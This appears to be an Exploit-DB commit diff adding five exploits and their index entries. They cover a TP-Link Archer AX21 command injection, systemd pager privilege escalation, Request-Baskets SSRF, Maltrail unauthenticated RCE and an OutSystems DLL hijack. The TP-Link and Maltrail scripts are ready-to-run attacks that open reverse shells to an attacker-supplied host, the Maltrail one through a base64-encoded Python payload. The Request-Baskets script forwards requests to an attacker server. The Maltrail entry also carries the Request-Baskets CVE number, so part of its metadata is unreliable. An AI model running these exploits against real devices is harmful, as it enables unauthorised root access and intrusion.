DB: 2023-08-11

6 changes to exploits/shellcodes/ghdb TP-Link Archer AX21 - Unauthenticated Command Injection systemd 246 - Local Privilege Escalation Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE) Request-Baskets v1.2.1 - Server-side request forgery (SSRF) OutSystems Service Studio 11.53.30 - DLL Hijacking
2023-08-11 00:16:25 +00:00 · 2023-08-11 00:16:25 +00:00 · f55092b332
commit f55092b332
parent 69f3ee7722
6 changed files with 182 additions and 0 deletions
--- a/exploits/hardware/remote/51677.py
+++ b/exploits/hardware/remote/51677.py
@ -0,0 +1,52 @@
+#!/usr/bin/python3
+#
+# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
+# Date: 07/25/2023
+# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)
+# Vendor Homepage: https://www.tp-link.com/us/
+# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)
+# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0
+# CVE: CVE-2023-1389
+#
+# Disclaimer: This script is intended to be used for educational purposes only.
+# Do not run this against any system that you do not have permission to test.
+# The author will not be held responsible for any use or damage caused by this
+# program.
+#
+# CVE-2023-1389 is an unauthenticated command injection vulnerability in the web
+# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the
+# *country* parameter of the *write* callback for the *country* form at the
+# "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is
+# possible to run commands as root. Execution requires sending the request twice;
+# the first request sets the command in the *country* value, and the second request
+# (which can be identical or not) executes it.
+#
+# This script is a short proof of concept to obtain a reverse shell. To read more
+# about the development of this script, you can read the blog post here:
+# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
+# Before running the script, start a nc listener on your preferred port -> run the script -> profit
+
+import requests, urllib.parse, argparse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+# Suppress warning for connecting to a router with a self-signed certificate
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+# Take user input for the router IP, and attacker IP and port
+parser = argparse.ArgumentParser()
+
+parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
+parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")
+parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")
+
+args = parser.parse_args()
+
+# Generate the reverse shell command with the attacker IP and port
+revshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")
+
+# URL to obtain the reverse shell
+url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"
+
+# Send the URL twice to run the command. Sending twice is necessary for the attack
+r = requests.get(url_command, verify=False)
+r = requests.get(url_command, verify=False)
--- a/exploits/linux/local/51674.txt
+++ b/exploits/linux/local/51674.txt
@ -0,0 +1,17 @@
+# Exploit Title: systemd 246 - Local Privilege Escalation
+# Exploit Author: Iyaad Luqman K (init_6)
+# Application: systemd 246
+# Tested on: Ubuntu 22.04
+# CVE: CVE-2023-26604
+
+systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user.
+This vulnerability allows a local attacker to gain root privileges.
+
+## Proof Of Concept:
+1. Run the systemctl command which can be run as root user.
+
+sudo /usr/bin/systemctl status any_service
+
+2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.
+
+3. Type in `!/bin/sh` in the pager to spawn a shell as root user.
--- a/exploits/python/webapps/51675.sh
+++ b/exploits/python/webapps/51675.sh
@ -0,0 +1,53 @@
+# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
+# Exploit Author: Iyaad Luqman K (init_6)
+# Application: Request-Baskets v1.2.1
+# Tested on: Ubuntu 22.04
+# CVE: CVE-2023-27163
+
+
+# PoC
+#!/bin/bash
+
+
+if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
+    help="Usage: exploit.sh <URL> <TARGET>\n\n";
+    help+="Arguments:\n" \
+    help+=" URL            main path (/) of the server (eg. http://127.0.0.1:5000/)\n";
+    help+=" TARGET";
+
+    echo -e "$help";
+    exit 1;
+fi
+
+URL=$1
+ATTACKER_SERVER=$2
+
+if [ "${URL: -1}" != "/" ]; then
+    URL="$URL/";
+fi;
+
+BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");
+
+API_URL="$URL""api/baskets/$BASKET_NAME";
+
+PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";
+
+echo "> Creating the \"$BASKET_NAME\" proxy basket...";
+
+if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then
+    echo "> FATAL: Could not properly request $API_URL. Is the server online?";
+    exit 1;
+fi;
+
+BASKET_URL="$URL$BASKET_NAME";
+
+echo "> Basket created!";
+echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";
+
+if ! jq --help 1>/dev/null; then
+    echo "> Response body (Authorization): $response";
+else
+    echo "> Authorization: $(echo "$response" | jq -r ".token")";
+fi;
+
+exit 0;
--- a/exploits/python/webapps/51676.py
+++ b/exploits/python/webapps/51676.py
@ -0,0 +1,35 @@
+# Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)
+# Exploit Author: Iyaad Luqman K (init_6)
+# Application: Maltrail v0.53
+# Tested on: Ubuntu 22.04
+# CVE: CVE-2023-27163
+
+
+# PoC
+import sys;
+import os;
+import base64;
+
+def main():
+	listening_IP = None
+	listening_PORT = None
+	target_URL = None
+
+	if len(sys.argv) != 4:
+		print("Error. Needs listening IP, PORT and target URL.")
+		return(-1)
+
+	listening_IP = sys.argv[1]
+	listening_PORT = sys.argv[2]
+	target_URL = sys.argv[3] + "/login"
+	print("Running exploit on " + str(target_URL))
+	curl_cmd(listening_IP, listening_PORT, target_URL)
+
+def curl_cmd(my_ip, my_port, target_url):
+	payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
+	encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
+	command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
+	os.system(command)
+
+if __name__ == "__main__":
+  main()
--- a/exploits/windows/local/51678.txt
+++ b/exploits/windows/local/51678.txt
@ -0,0 +1,20 @@
+# Exploit Title: OutSystems Service Studio 11.53.30 - DLL Hijacking
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://www.outsystems.com/
+# Version: Up to 11.53.30 (Build 61739)
+# Tested on: Windows
+# CVE : CVE-2022-47636
+
+A DLL hijacking vulnerability has been discovered in OutSystems Service
+Studio 11 11.53.30 build 61739.
+When a user open a .oml file (OutSystems Modeling Language), the
+application will load the following DLLs from the same directory:
+
+av_libGLESv2.dll
+libcef.DLL
+user32.dll
+d3d10warp.dll
+
+Using a crafted DLL, it is possible to execute arbitrary code in the
+context of the current logged in user.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -3939,6 +3939,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 829,exploits/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,remote,hardware,80,2005-02-18,,1,OSVDB-14023;CVE-2005-0494,,,,,
 10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",remote,hardware,,2009-12-08,,0,OSVDB-104795,,,,,
 40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",remote,hardware,,2016-08-19,2017-11-22,0,,,,,,
+51677,exploits/hardware/remote/51677.py,"TP-Link Archer AX21 - Unauthenticated Command Injection",2023-08-10,Voyag3r,remote,hardware,,2023-08-10,2023-08-10,0,CVE-2023-1389,,,,,
 38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,remote,hardware,,2015-09-15,2015-09-15,0,OSVDB-127536,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
 26318,exploits/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,remote,hardware,,2013-06-19,2013-06-19,0,OSVDB-94429,,,,,
 50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,"Tomas Melicher",remote,hardware,,2022-06-14,2022-06-14,0,CVE-2022-30075,,,,,
@ -7734,6 +7735,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,,2018-01-31,2018-01-31,0,CVE-2017-18078,,,,,http://seclists.org/oss-sec/2018/q1/115
 45715,exploits/linux/local/45715.txt,"systemd - 'chown_one()' Dereference Symlinks",2018-10-29,"Google Security Research",local,linux,,2018-10-29,2018-11-17,1,CVE-2018-15687,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1689
 41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation",2017-01-24,"Sebastian Krahmer",local,linux,,2017-01-26,2019-03-07,0,CVE-2016-10156,,,,,http://www.openwall.com/lists/oss-security/2017/01/24/4
+51674,exploits/linux/local/51674.txt,"systemd 246 - Local Privilege Escalation",2023-08-10,"Iyaad Luqman K",local,linux,,2023-08-10,2023-08-10,1,CVE-2023-26604,,,,,
 15620,exploits/linux/local/15620.sh,"SystemTap - Local Privilege Escalation",2010-11-26,"Tavis Ormandy",local,linux,,2010-11-26,2010-11-26,1,CVE-2010-4170;OSVDB-69489,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-26-at-62953-am.png,,
 33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",local,linux,,2010-02-05,2014-06-01,1,CVE-2010-0411;OSVDB-62131,,,,,https://www.securityfocus.com/bid/38120/info
 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
@ -34652,6 +34654,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
+51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
 51276,exploits/python/webapps/51276.go,"modoboa  2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,,
 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
@ -34662,6 +34665,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
 51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,,
+51675,exploits/python/webapps/51675.sh,"Request-Baskets v1.2.1 - Server-side request forgery (SSRF)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,
@ -41095,6 +41099,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51128,exploits/windows/local/51128.txt,"Outline V1.6.0 - Unquoted Service Path",2023-03-29,"Milad karimi",local,windows,,2023-03-29,2023-03-29,0,,,,,,
 21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,local,windows,,2001-08-30,2012-09-10,1,OSVDB-11941,,,,,https://www.securityfocus.com/bid/3271/info
 29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",local,windows,,2007-01-15,2013-11-12,1,CVE-2007-0333;OSVDB-33480,,,,http://www.exploit-db.comoutpost_firewall_pro_v4.0_build_1005.590.123.zip,https://www.securityfocus.com/bid/22069/info
+51678,exploits/windows/local/51678.txt,"OutSystems Service Studio 11.53.30 - DLL Hijacking",2023-08-10,shinnai,local,windows,,2023-08-10,2023-08-10,0,CVE-2022-47636,,,,,
 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,,2019-11-14,2019-11-14,0,,,,,,
 920,exploits/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure",2005-04-07,Kozan,local,windows,,2005-04-06,,1,OSVDB-15312;CVE-2005-1097,,,,,
 44900,exploits/windows/local/44900.txt,"Pale Moon Browser < 27.9.3 - Use After Free (PoC)",2018-06-18,"Berk Cem Göksel",local,windows,,2018-06-18,2018-06-19,0,CVE-2018-12292,"Use After Free (UAF)",,,,